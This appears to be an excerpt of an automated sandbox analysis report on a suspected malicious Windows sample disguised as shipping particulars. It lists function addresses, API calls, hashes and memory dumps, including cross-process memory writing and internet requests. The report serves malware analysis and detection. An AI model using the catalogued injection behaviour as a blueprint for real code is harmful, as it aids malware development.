                              Download Yara Rule
                              APIs
                                • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                              • String ID: @
                              • API String ID: 4150878124-2766056989
                              • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                              • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                              • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                              Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: \$]$h
                              • API String ID: 4104443479-3262404753
                              • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                              • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                              • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                              Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                              Download Yara Rule
                              APIs
                              • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • CloseHandle.KERNEL32(?), ref: 00457E09
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                              • String ID: <$@
                              • API String ID: 2417854910-1426351568
                              • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                              • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                              • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                              Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                              Download Yara Rule
                              APIs
                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                              • String ID:
                              • API String ID: 3705125965-3916222277
                              • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                              • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                              • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                              Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32 ref: 0045FAC4
                              • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                              • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Delete$InfoItem
                              • String ID: 0
                              • API String ID: 135850232-4108050209
                              • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                              • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                              • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                              Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                              • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                              • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                              • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                              Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                              • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                              • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                              Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(00000000), ref: 00450A2F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: msctls_updown32
                              • API String ID: 3375834691-2298589950
                              • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                              • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                              • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                              Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: $<
                              • API String ID: 4104443479-428540627
                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                              Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                              Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                              Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                              Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                              • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                              • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                              Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                              • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                              • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                              Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                              • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                              • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                              Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
